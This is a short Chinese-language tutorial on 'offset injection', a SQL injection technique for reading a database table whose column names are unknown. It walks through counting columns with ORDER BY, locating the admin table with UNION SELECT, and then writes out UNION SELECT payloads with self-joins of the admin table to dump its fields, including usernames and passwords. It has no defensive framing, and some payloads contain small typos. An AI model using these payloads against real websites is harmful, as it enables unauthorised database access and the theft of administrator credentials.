偏移注入:在注入过程中,可能会遇到注入知道表名,但是不知道列名,从而无法继续猜解,此时需要偏移注入解决。
偏移注入的流程:
1,判断字段数。例如:order by 猜字段数为22
2,判断表名。例如:union select 1,2,,,22 from admin (联合查询爆显位)
3,开始偏移注入。
union select 1,2,,,,,,21 * from admin //判断管理表的字段数,逐步测试直到显示正常为止,如到16时返回正常,则证明管理表里面有6个字段
union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b ona.id=b.id) //admin为表a与表b,每个表6个字段
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as bon a.id=b.id) inner join admin as c on a.id=c.id) //如果上述没爆到关键信息,则继续执行二级偏移注入查询。
偏移注入需要注意的几个点:管理表的字段数越少(一般三个username、id、password)、知道的管理表字段越多我们就越容易成功。